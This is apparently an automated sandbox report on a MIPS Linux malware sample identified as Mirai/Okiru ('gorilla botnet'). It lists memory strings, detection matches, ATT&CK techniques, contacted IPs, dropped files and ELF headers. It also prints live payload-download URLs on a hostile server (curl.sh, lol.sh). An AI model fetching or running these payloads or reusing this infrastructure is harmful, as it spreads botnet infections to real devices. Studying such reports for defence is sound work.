            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/purple-send!/usr/bin/gzip1/usr/bin/systemd-notify10!/usr/bin/less0!/usr/bin/qemu-sparc1/usr/bin/grub-mkstandalone
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-arm
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/delv0!/usr/bin/python1/usr/bin/qemu-armips/s10!/usr/bin/foo2lava1/usr/bin/xfce4-appearance-settings1/usr/bin/bzexe/mips/10!/usr/bin/luac5.31/usr/bin/systemd-socket-activate1/usr/bin/mono-find-provides
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsel
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /mips/usr/bin/qemu-alpha
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vgauth-smoketest
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/pa-info!/usr/bin/xdpyinfo1/usr/bin/hciconfigps/s10!/usr/bin/ristretto!/usr/bin/sleep1/usr/bin/xfce4-popup-notes0!/usr/bin/qemu-ppc64le!/usr/bin/wdctl1/usr/bin/zgrep/mips/10!/usr/bin/tty0!/usr/bin/mdoc1/usr/bin/desktop-file-edit
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/dev/dvd0 /dev/vmci1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/hp-pkservice!/usr/bin/preunzip1/usr/bin/systemd-hwdbs10!/usr/bin/sg_map26!/usr/bin/setterm1/usr/bin/sg_zonemips/s10!/usr/bin/viewres!/usr/bin/bzcat!/usr/bin/mdbrebaseps/us1/usr/bin/vmware-vmblock-fuse
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-ppc64abi32
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmwarectrl
            Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmpBinary or memory string: %s/qemu-op
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/dbus-send!/usr/bin/toe1/usr/bin/qemu-aarch64s10!/usr/bin/pdfseparate!/usr/bin/nc1/usr/bin/mmcli/mips/s10!/usr/bin/bwrap0!/usr/bin/hp-plugin1/usr/bin/podcheckers/s10!/usr/bin/kbxutil!/usr/bin/xrdb1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vgauth-cmd
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/xhost0!/usr/bin/mutter1/usr/bin/monodocs2slashdoc0!/usr/bin/paperconf!/usr/bin/cli-al1/usr/bin/bdftruncate/10!/usr/bin/mt01/usr/bin/qemu-aarch64_be1/usr/bin/xdg-user-dirs-update
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-vmblock-fuse
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/usr/bin/qemu-cris1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-x86_64
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/10 /usr/bin/perldoc!/usr/bin/vmhgfs-fuse1/usr/bin/thunar-settings
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/usr/bin/qemu-alpha
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/stty0!/run/vmware
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/ping60!/usr/bin/sg_write_long1/usr/bin/mate-calcps/s10!/usr/bin/qemu-s390x!/usr/bin/ionice1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/cert-sync!/usr/bin/qemu-riscv321/usr/bin/byobu-select-profile0!/usr/bin/catman0!/usr/bin/jsondiff1/usr/bin/qemu-mips64els10!/usr/bin/link0!/usr/bin/man-recode1/usr/bin/select-editors10!/usr/bin/printafm!/usr/bin/pycompile1/usr/bin/ntfsfallocates10!/usr/bin/psfxtable!/usr/bin/factor1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-riscv64
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-armeb
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-rpctool
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-m68k
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /run/vmware
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmhgfs-fuse
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/mktemp0!/usr/bin/qemu-xtensa1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10!/usr/bin/qemu-mips!/usr/bin/pax11publish1/usr/bin/bzip2/mips/s10!/usr/bin/xbiff0!/usr/bin/ucs2any1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/10 /usr/bin/tificc0!/usr/bin/al21/usr/bin/vmware-vgauth-smoketest
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /dev/vmci
            Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmpBinary or memory string: /tmp/qemu-open.zlEnOZ
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/us1/usr/bin/ruby/mips/0!/usr/bin/fwupdagent!/usr/bin/lzgrep/mips/us1/usr/bin/xfce4-panel-profiles0!/usr/bin/readlink!/usr/bin/lprU/mips/us1/usr/bin/linux-update-symlinks0!/usr/bin/splitfont!/usr/bin/isoinfomips/us1/usr/bin/dbus-cleanup-sockets0!/usr/bin/umount!/usr/bin/sudoreplays/us1/usr/bin/qemu-ppc64abi320!/usr/bin/setlogcons!/usr/bin/xz
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-i386
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/gsnd0!/usr/bin/fc-validate1/usr/bin/mdig/mips/s10!/usr/bin/ssh01/usr/bin/btrfs-find-root1/usr/bin/objcopymips/s10!/usr/bin/sdptool!/usr/bin/startx1/usr/bin/x86_64-linux-gnu-cpp-90!/usr/bin/qemu-sh4!/usr/bin/codepage1/usr/bin/Thunar/mips/s10!/usr/bin/pstree0!/usr/bin/ss1@v!
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /tmp/vmware-root_727-4290690966
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-or1k
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmwarectrl
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/pod2usage!/usr/bin/gprof1/usr/bin/qemu-xtensaebs10!/usr/bin/dirmngr-client!/usr/bin/rlogin1/usr/bin/min12xxwips/s10!/usr/bin/fwupdate!/usr/bin/lsusb1/usr/bin/dtd2rngmips/s10!/usr/bin/Xorg0!/usr/bin/lzless1@
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/ntfstruncate!/var/run/acpid.socket1/usr/bin/grub-fstest/10!/usr/bin/pdf2ps0!/var/run/vmware1/usr/bin/ssh-import-id-gh
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U!/usr/bin/vmtoolsd
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-alpha
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/vmware-namespace-cmd
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-sh4eb
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/pyjwt30!/usr/bin/qemu-x86_64U1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-sparc64
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /mips/usr/bin/vmwarectrl
            Source: mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmpBinary or memory string: x86_64/usr/bin/qemu-mips/tmp/mips.nn.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/mips.nn.elf
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-xtensaeb
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/proc/3246/exe!/proc/3429/exet/mips/pr!/run/snapd.socketips/tm1/usr/bin/qemu-microblaze
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-xtensa
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/10 /usr/bin/netcat01/usr/bin/xfce4-settings-editor`!/usr/bin/unlzma1/usr/bin/qemu-ppc64s/s10!/usr/bin/nstat0!/usr/bin/jjs1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /etc/qemu-binfmt/mips
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: P /usr/bin/qemu-cris
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmp, mips.nn.elf, 5433.1.00007ffdbdb7b000.00007ffdbdb9c000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mips
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-tilegx
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: !/usr/bin/uuidgen1/usr/bin/byobu-keybindings0!/usr/bin/GET0!/usr/bin/znew1/usr/bin/qemu-or1kps/s10!/usr/bin/openvt0!/usr/bin/lspgpot1
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: U/mips/s10 /usr/bin/nisdomainname!/usr/bin/apt1/usr/bin/tabs/mips/s10!/usr/bin/qemu-i386!/usr/bin/mkisofs1/usr/bin/grep/mips/s10!/usr/bin/rygel0!/usr/bin/qemu-m68k1/usr/bin/system-config-printer-applet!/usr/bin/hp-check1/usr/bin/md5sum.textutils1/usr/bin/aa-execmips/s10!/usr/bin/vdir0!/usr/bin/phar7.41
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-aarch64_be
            Source: mips.nn.elf, 5433.1.000055c01d17c000.000055c01d248000.rw-.sdmpBinary or memory string: /usr/bin/qemu-mipsn32el

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: mips.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: mips.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mips.nn.elf PID: 5433, type: MEMORYSTR

            Remote Access Functionality

            barindex
            Source: Yara matchFile source: mips.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: mips.nn.elf, type: SAMPLE
            Source: Yara matchFile source: 5433.1.00007fa4d0400000.00007fa4d0420000.r-x.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: mips.nn.elf PID: 5433, type: MEMORYSTR
            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity Information1
            Scripting
            Valid AccountsWindows Management Instrumentation1
            Scripting
            Path Interception1
            File Deletion
            1
            OS Credential Dumping
            11
            Security Software Discovery
            Remote ServicesData from Local System1
            Non-Standard Port
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            No configs have been found
            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Number of created Files
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1575253 Sample: mips.nn.elf Startdate: 15/12/2024 Architecture: LINUX Score: 76 25 129.76.65.112, 23, 48984 WN-WY-ASUS United States 2->25 27 144.26.145.231 WCUUS United States 2->27 29 98 other IPs or domains 2->29 31 Antivirus / Scanner detection for submitted sample 2->31 33 Multi AV Scanner detection for submitted file 2->33 35 Yara detected Okiru 2->35 37 Yara detected Mirai 2->37 8 mips.nn.elf 2->8         started        11 gnome-session-binary sh gsd-housekeeping 2->11         started        13 udisksd dumpe2fs 2->13         started        15 4 other processes 2->15 signatures3 process4 signatures5 39 Sample deletes itself 8->39 17 mips.nn.elf 8->17         started        process6 process7 19 mips.nn.elf 17->19         started        21 mips.nn.elf 17->21         started        23 mips.nn.elf 17->23         started       
            SourceDetectionScannerLabelLink
            mips.nn.elf42%ReversingLabsLinux.Backdoor.Mirai
            mips.nn.elf100%AviraEXP/ELF.Mirai.W
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            No contacted domains info
            NameSourceMaliciousAntivirus DetectionReputation
            http://94.156.227.233/curl.shmips.nn.elffalse
              high
              http://94.156.227.233/lol.shmips.nn.elffalse
                high
                http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/smips.nn.elffalse
                  high
                  http://94.156.227.233/mips.nn.elffalse
                    high
                    • No. of IPs < 25%
                    • 25% < No. of IPs < 50%
                    • 50% < No. of IPs < 75%
                    • 75% < No. of IPs
                    IPDomainCountryFlagASNASN NameMalicious
                    114.171.214.248
                    unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                    123.238.41.160
                    unknownIndia
                    18101RELIANCE-COMMUNICATIONS-INRelianceCommunicationsLtdDAKCfalse
                    46.235.136.66
                    unknownItaly
                    197589ALFANEWSITfalse
                    162.16.207.15
                    unknownUnited States
                    35893ACPCAfalse
                    25.95.13.157
                    unknownUnited Kingdom
                    7922COMCAST-7922USfalse
                    79.230.205.174
                    unknownGermany
                    3320DTAGInternetserviceprovideroperationsDEfalse
                    106.171.143.33
                    unknownJapan2516KDDIKDDICORPORATIONJPfalse
                    92.103.218.129
                    unknownFrance
                    12670AS-COMPLETELFRfalse
                    131.47.77.23
                    unknownUnited States
                    409AFCONC-BLOCK1-ASUSfalse
                    176.158.31.11
                    unknownFrance
                    5410BOUYGTEL-ISPFRfalse
                    16.92.248.169
                    unknownUnited States
                    unknownunknownfalse
                    187.205.15.107
                    unknownMexico
                    8151UninetSAdeCVMXfalse
                    73.158.5.250
                    unknownUnited States
                    7922COMCAST-7922USfalse
                    124.46.93.136
                    unknownKorea Republic of
                    4668LGNET-AS-KRLGCNSKRfalse
                    207.73.92.61
                    unknownUnited States
                    237MERIT-AS-14USfalse
                    193.0.152.73
                    unknownRussian Federation
                    198758ASTELEKRUfalse
                    158.22.228.197
                    unknownUnited States
                    1504DNIC-AS-01504USfalse
                    185.204.137.224
                    unknownIreland
                    199256LTH-ASIEfalse
                    212.138.90.110
                    unknownSaudi Arabia
                    8895ISUInternetServicesUnitISUSAfalse
                    38.116.126.9
                    unknownUnited States
                    174COGENT-174USfalse
                    89.234.28.7
                    unknownUnited Kingdom
                    15395RACKSPACE-LONGBfalse
                    175.235.81.175
                    unknownKorea Republic of
                    4766KIXS-AS-KRKoreaTelecomKRfalse
                    198.185.241.102
                    unknownUnited States
                    394612UPMC-PHSUSfalse
                    40.4.203.143
                    unknownUnited States
                    4249LILLY-ASUSfalse
                    173.255.36.239
                    unknownUnited States
                    1970TAMUS-NETUSfalse
                    85.71.211.239
                    unknownCzech Republic
                    5610O2-CZECH-REPUBLICCZfalse
                    179.225.107.21
                    unknownBrazil
                    26599TELEFONICABRASILSABRfalse
                    21.127.118.106
                    unknownUnited States
                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    134.49.149.213
                    unknownUnited States
                    23138FIRST-STEPUSfalse
                    194.89.26.187
                    unknownFinland
                    1759TSF-IP-CORETeliaFinlandOyjEUfalse
                    37.0.114.158
                    unknownGermany
                    10780PURE-STORAGEUSfalse
                    148.221.95.25
                    unknownMexico
                    8151UninetSAdeCVMXfalse
                    100.61.74.33
                    unknownUnited States
                    701UUNETUSfalse
                    142.188.170.28
                    unknownCanada
                    577BACOMCAfalse
                    207.194.51.58
                    unknownCanada
                    852ASN852CAfalse
                    38.177.215.166
                    unknownUnited States
                    174COGENT-174USfalse
                    57.41.27.141
                    unknownBelgium
                    2686ATGS-MMD-ASUSfalse
                    197.89.53.21
                    unknownSouth Africa
                    10474OPTINETZAfalse
                    158.20.103.146
                    unknownUnited States
                    1482DNIC-AS-01482USfalse
                    60.239.176.88
                    unknownJapan2518BIGLOBEBIGLOBEIncJPfalse
                    88.119.98.42
                    unknownLithuania
                    8764TELIA-LIETUVALTfalse
                    79.133.33.157
                    unknownGermany
                    203833AT-FIRSTCOLOAustriaATfalse
                    81.186.24.135
                    unknownGreece
                    8248GR-EDUNETGRfalse
                    215.177.131.37
                    unknownUnited States
                    721DNIC-ASBLK-00721-00726USfalse
                    144.90.147.91
                    unknownUnited States
                    6652PIMA-COLLEGEUSfalse
                    92.221.125.208
                    unknownNorway
                    29695ALTIBOX_ASNorwayNOfalse
                    122.3.67.242
                    unknownPhilippines
                    9299IPG-AS-APPhilippineLongDistanceTelephoneCompanyPHfalse
                    82.190.169.163
                    unknownItaly
                    3269ASN-IBSNAZITfalse
                    36.220.67.2
                    unknownChina
                    9394CTTNETChinaTieTongTelecommunicationsCorporationCNfalse
                    180.219.174.220
                    unknownHong Kong
                    17924SMARTONE-MB-AS-APSmarToneMobileCommunicationsLtdHKfalse
                    129.76.65.112
                    unknownUnited States
                    2902WN-WY-ASUSfalse
                    173.104.161.185
                    unknownUnited States
                    1239SPRINTLINKUSfalse
                    12.244.58.105
                    unknownUnited States
                    7018ATT-INTERNET4USfalse
                    178.135.97.139
                    unknownLebanon
                    42003OGERONETOGEROTelecomLBfalse
                    215.3.75.75
                    unknownUnited States
                    721DNIC-ASBLK-00721-00726USfalse
                    65.185.252.214
                    unknownUnited States
                    16787CHARTER-16787-DCUSfalse
                    46.62.214.21
                    unknownIran (ISLAMIC Republic Of)
                    16322PARSONLINETehran-IRANIRfalse
                    22.240.106.198
                    unknownUnited States
                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    12.12.27.70
                    unknownUnited States
                    32328ALASCOM-IP-MANAGED-NETWORKUSfalse
                    186.116.34.231
                    unknownColombia
                    3816COLOMBIATELECOMUNICACIONESSAESPCOfalse
                    158.211.143.99
                    unknownJapan2907SINET-ASResearchOrganizationofInformationandSystemsNfalse
                    12.138.17.22
                    unknownUnited States
                    7018ATT-INTERNET4USfalse
                    89.110.32.213
                    unknownRussian Federation
                    12389ROSTELECOM-ASRUfalse
                    119.250.63.90
                    unknownChina
                    4837CHINA169-BACKBONECHINAUNICOMChina169BackboneCNfalse
                    186.52.142.205
                    unknownUruguay
                    6057AdministracionNacionaldeTelecomunicacionesUYfalse
                    222.90.52.105
                    unknownChina
                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                    221.141.199.204
                    unknownKorea Republic of
                    9318SKB-ASSKBroadbandCoLtdKRfalse
                    192.47.235.205
                    unknownJapan5501FRAUNHOFER-CLUSTER-BWResearchInstitutesspreadalloverGefalse
                    193.42.34.225
                    unknownGermany
                    3221EENET-ASEEfalse
                    46.196.44.254
                    unknownTurkey
                    47524TURKSAT-ASTRfalse
                    37.151.174.83
                    unknownKazakhstan
                    9198KAZTELECOM-ASKZfalse
                    155.145.125.114
                    unknownUnited Kingdom
                    1221ASN-TELSTRATelstraCorporationLtdAUfalse
                    49.252.15.30
                    unknownJapan37903EMOBILEYmobileCorporationJPfalse
                    99.29.22.148
                    unknownUnited States
                    7018ATT-INTERNET4USfalse
                    141.132.77.8
                    unknownAustralia
                    7575AARNET-AS-APAustralianAcademicandResearchNetworkAARNefalse
                    186.216.174.221
                    unknownBrazil
                    262753VOCETELECOMUNICACOESLTDABRfalse
                    153.242.20.149
                    unknownJapan4713OCNNTTCommunicationsCorporationJPfalse
                    182.96.202.150
                    unknownChina
                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                    209.50.30.196
                    unknownUnited States
                    15108ALLO-COMMUSfalse
                    93.37.49.195
                    unknownItaly
                    12874FASTWEBITfalse
                    215.235.57.72
                    unknownUnited States
                    721DNIC-ASBLK-00721-00726USfalse
                    132.15.117.214
                    unknownUnited States
                    409AFCONC-BLOCK1-ASUSfalse
                    165.95.81.150
                    unknownUnited States
                    1970TAMUS-NETUSfalse
                    202.145.152.143
                    unknownTaiwan; Republic of China (ROC)
                    9924TFN-TWTaiwanFixedNetworkTelcoandNetworkServiceProvifalse
                    44.194.239.200
                    unknownUnited States
                    14618AMAZON-AESUSfalse
                    203.42.234.208
                    unknownAustralia
                    1221ASN-TELSTRATelstraCorporationLtdAUfalse
                    202.212.151.129
                    unknownJapan2514INFOSPHERENTTPCCommunicationsIncJPfalse
                    52.151.73.99
                    unknownUnited States
                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    144.26.145.231
                    unknownUnited States
                    29848WCUUSfalse
                    1.235.239.80
                    unknownKorea Republic of
                    9318SKB-ASSKBroadbandCoLtdKRfalse
                    81.235.23.99
                    unknownSweden
                    3301TELIANET-SWEDENTeliaCompanySEfalse
                    198.109.38.100
                    unknownUnited States
                    237MERIT-AS-14USfalse
                    125.148.154.29
                    unknownKorea Republic of
                    4766KIXS-AS-KRKoreaTelecomKRfalse
                    215.179.148.91
                    unknownUnited States
                    721DNIC-ASBLK-00721-00726USfalse
                    8.45.209.183
                    unknownUnited States
                    30453PATRICK-SOLUTIONS-INCUSfalse
                    38.98.109.142
                    unknownUnited States
                    18698IAC-NYC-AS01USfalse
                    20.181.7.34
                    unknownUnited States
                    8075MICROSOFT-CORP-MSN-AS-BLOCKUSfalse
                    171.93.229.84
                    unknownChina
                    4134CHINANET-BACKBONENo31Jin-rongStreetCNfalse
                    204.208.92.154
                    unknownUnited States
                    5972DNIC-ASBLK-05800-06055USfalse
                    11.120.224.250
                    unknownUnited States
                    27651ENTELCHILESACLfalse
                    No context
                    No context
                    No context
                    No context
                    No context
                    Process:/tmp/mips.nn.elf
                    File Type:ASCII text
                    Category:dropped
                    Size (bytes):53
                    Entropy (8bit):3.871459242626451
                    Encrypted:false
                    SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                    MD5:2BD9B4BE30579E633FC0191AA93DF486
                    SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                    SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                    SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:gorilla botnet is on the device ur not a cat go away.
                    Process:/tmp/mips.nn.elf
                    File Type:ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):17
                    Entropy (8bit):3.4992275471326932
                    Encrypted:false
                    SSDEEP:3:TgaLOln:TgAKn
                    MD5:3B2A108EB9BDAC564681D1D50B5B8E8F
                    SHA1:E744F918D99769B49D0C6E8CBEDD4A1590CBBD1E
                    SHA-256:B89FE9B42F66509FF52B529092B42F8D759FB8E03059E8CC4039940A45287D87
                    SHA-512:52A5D2AB05D38B4EEE703B8344837CA7B890D6C8CC32C7AAEE8F128EBBE5F45A92A72A54E8A14B4DB61E9E7E002CED615B52E7503F50FB46AD8738921B1C98A5
                    Malicious:false
                    Reputation:moderate, very likely benign file
                    Preview:/tmp/mips.nn.elf.
                    File type:ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV), statically linked, stripped
                    Entropy (8bit):5.712211284941116
                    TrID:
                    • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                    File name:mips.nn.elf
                    File size:135'112 bytes
                    MD5:2145cb16a925a273d569c25257eb701a
                    SHA1:821c929b723b9c69683f96b921132e0ff98ac9a1
                    SHA256:beeeaa8013f74e611c30f4a99aebe4f5e38f3403a3d8314379428ab0a1ddd244
                    SHA512:b40814b92ba58edd3cf9814877ba6a9a3538fb2e748b18d49e731b9f7459ff1f3ed47b25781b82df8f61e51288cfd956a0138e71f8aa75f3c9893a8676fd596c
                    SSDEEP:3072:M1syNDJJX/gcGzGZsJs/3e+CjxshzgnnuKCXO:osyNDJJX/gclK2mxRC+
                    TLSH:A2D3D71E6E318F6DF769C33947B78A20979837C627D0C685D27CE9211E6034E641FBA8
                    File Content Preview:.ELF.....................@.`...4.........4. ...(.............@...@...........................E...E........1(........dt.Q............................<...'..L...!'.......................<...'..(...!... ....'9... ......................<...'......!........'9.

                    ELF header

                    Class:ELF32
                    Data:2's complement, big endian
                    Version:1 (current)
                    Machine:MIPS R3000
                    Version Number:0x1
                    Type:EXEC (Executable file)
                    OS/ABI:UNIX - System V
                    ABI Version:0
                    Entry Point Address:0x400260
                    Flags:0x1007
                    ELF Header Size:52
                    Program Header Offset:52
                    Program Header Size:32
                    Number of Program Headers:3
                    Section Header Offset:134552
                    Section Header Size:40
                    Number of Section Headers:14
                    Header String Table Index:13
                    NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                    NULL0x00x00x00x00x0000
                    .initPROGBITS0x4000940x940x8c0x00x6AX004
                    .textPROGBITS0x4001200x1200x1cd000x00x6AX0016
                    .finiPROGBITS0x41ce200x1ce200x5c0x00x6AX004
                    .rodataPROGBITS0x41ce800x1ce800x30100x00x2A0016
                    .ctorsPROGBITS0x45fe940x1fe940x80x00x3WA004
                    .dtorsPROGBITS0x45fe9c0x1fe9c0x80x00x3WA004
                    .data.rel.roPROGBITS0x45fea80x1fea80x1380x00x3WA004
                    .dataPROGBITS0x45ffe00x1ffe00x6100x00x3WA0016
                    .gotPROGBITS0x4605f00x205f00x7440x40x10000003WAp0016
                    .sbssNOBITS0x460d340x20d340x200x00x10000003WAp004
                    .bssNOBITS0x460d600x20d340x225c0x00x3WA0016
                    .mdebug.abi32PROGBITS0xdec0x20d340x00x00x0001
                    .shstrtabSTRTAB0x00x20d340x640x00x0001
                    TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                    LOAD0x00x4000000x4000000x1fe900x1fe905.72480x5R E0x10000.init .text .fini .rodata
